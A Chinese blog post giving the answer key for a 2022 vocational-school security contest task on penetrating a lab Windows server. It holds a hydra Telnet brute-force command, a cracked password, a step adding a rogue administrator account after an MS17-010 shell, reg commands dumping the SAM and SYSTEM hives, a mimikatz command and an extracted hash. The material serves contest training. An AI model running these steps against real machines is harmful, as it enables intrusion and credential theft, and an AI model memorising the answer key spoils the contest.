B-1:Windows操作系统渗透测试

最新推荐文章于 2024-05-23 12:30:00 发布
最新推荐文章于 2024-05-23 12:30:00 发布
阅读量1.8k 收藏 23
点赞数 7
分类专栏: # 2022年福建省中职组“网络安全”赛项 文章标签: windows 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130182279
版权 
B-1:Windows操作系统渗透测试
服务器场景:Server2003
服务器场景操作系统:Windows7
1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;
2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
3. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
6. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;
7. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;


flag:232

2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)


flag:hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://172.16.102.248 -s 232

3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)


flag:customer

4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

提取sam文件需要administrator权限,我们查看靶机445端口尝试利用ms17-010漏洞获取shell


添加一个管理员用户,远程桌面进去
net user syh 111111 /add
net localgroup administrators syh /add


flag:reg save hklm\sam sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;


flag:reg save hklm\system system.hive
6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;

flag:lsadump::sam
7.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

flag:6cfa9ce05f0afaa483beaea6567ea26e

Wh1teSu
关注
  • 7
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2023年网络安全竞赛服务远程控制任务解析
旺仔Sec&blog
02-07 2954
2023年网络安全竞赛服务远程控制任务解析
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
平台选项 (`--platform`) 是指payload所针对的操作系统,如`windows`、`linux`或`android`。`msfvenom --help-platforms`命令列出所有支持的平台,确保payload与目标系统兼容。 生成payload时,还需要指定输出格式 ...
Linux操作系统渗透测试
weixin_72466436的博客
03-26 488
Linux操作系统渗透测试
Kali渗透Windows服务器
最新发布
A_991128a的博客
05-23 656
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1325
渗透测试命令
[渗透测试]—1.3 Windows操作系统基本操作
Andy0214的专栏
06-26 6053
对于渗透测试工程师来说,熟悉Windows操作系统的基本操作也是非常重要的。在这一节,我们将详细介绍Windows操作系统的基本操作,包括文件系统、常用命令及命令提示符(CMD)和PowerShell的使用等。
windows渗透测试
Aluxian_的博客
05-25 9100
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
Windows操作系统渗透测试
m0_65422235的博客
03-18 849
Windows操作系统渗透测试
红蓝对抗渗透测试2(第十七课)1
08-03
Pupy由Python编写,支持Windows、Linux、OSX和Android等操作系统,具备全内存操作和进程注入等功能。通过Pupy,渗透测试人员可以在目标系统实现远程代码执行,利用多种传输方式通信,并能在内存迁移和注入进程。...
2023年内蒙古自治区网络安全赛题-B模块
06-01
1. **攻击日志分析**:参赛者需要从FTP服务器上下载数据包文件并分析,找出黑客的IP地址、开放的端口、操作系统版本以及黑客入侵后执行的命令及其返回结果。这需要掌握网络协议分析、日志解析和网络安全事件响应的...
渗透安全面试题库-v3.pdf
08-10
1. **信息收集**:这是渗透测试的第一步,包括域名Whois信息收集、服务器旁站和子域名搜索、操作系统和Web间件识别、IP端口扫描和漏洞探测、网站目录结构扫描以及Google Hack技术来获取网站的更多信息。...
WEB渗透测试数据库
04-01
pen.py passwdgen --fullname "lin zhi ling" --birthday 1980-1-1 --phone 12344445555 --qq 34233888 -o password.txt 3.1.4 URI敏感文件爆破 pen.py的uribrute子命令提供了URI敏感文件爆破,URI爆破字典生成的...
Linux操作系统渗透
JJH2724719395的博客
04-15 553
linux操作系统渗透
记录一次Windows7操作系统渗透测试
旺仔Sec&blog
05-12 956
Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。故意输入计算机病毒等破坏性程序,或者以其他方式破坏计算机信息系统功能,造成计算机信息系统无法正常运行或者不能正常使用,危害计算机信息系统安全的,依照本法的规定追究刑事责任。那么我们得知密码只有,回想前面的nmap扫描得知靶机开放3389远程连接端口,我们可以直接使用密码远程到系统当
B-9:Linux操作系统渗透测
m0_45155797的博客
04-13 932
B-9:Linux操作系统渗透测 任务环境说明:  服务器场景:Server2130  服务器场景操作系统:Linux(关闭链接) 1.通过本地PC渗透测试平台Kali对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果Apache服务对应的版本信息字符串作为Flag值提交; 2.通过本地PC渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录waf防火墙文件的所有的被过滤的字符串内容作为Flag值提交;(如:"-","$","^","&",......)
渗透测试常用工具汇总_渗透测试实战
程序员阿飘 的博客
03-11 306
此外,它还具有功能齐全的仪表板、广泛的扫描功能和多格式报告功能。安装过程有两种,一是在Windows系统上安装python环境,在此基础上安装SQL map,二是使用虚拟机安装kali系统,该系统自带SQL map工具。项目已有超过130个的插件,这些插件可以检测SQL注入、跨站脚本、本地和远程文件包含等漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它的目标是创建一个易于使用和扩展、能够发现和利用Web应用程序漏洞的主体框架。
记一次四层内网攻防渗透测试大实验
2301_76786857的博客
08-09 554
先使用常见的 ICMP 协议查看目标,目标网站的IP为192.168.1.129ping 192.168.1.129 # 探测目标主机 然后直接对目标IP进行端口扫描:nmap -T4 -sC -sV -p 1-10000 192.168.1.129如上图,目标开启了22、80、81和6379端口。 对目标192.168.1.129进行目录爆破:python3 dirsearch.py -u "http://192.168.1.129" -e *拼接url:http://192.168.1.129/mana
Windows 免费渗透测试套件,包含140多款工具
Innocence_0的博客
02-06 269
Windows 免费渗透测试套件,包含140多款工具

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值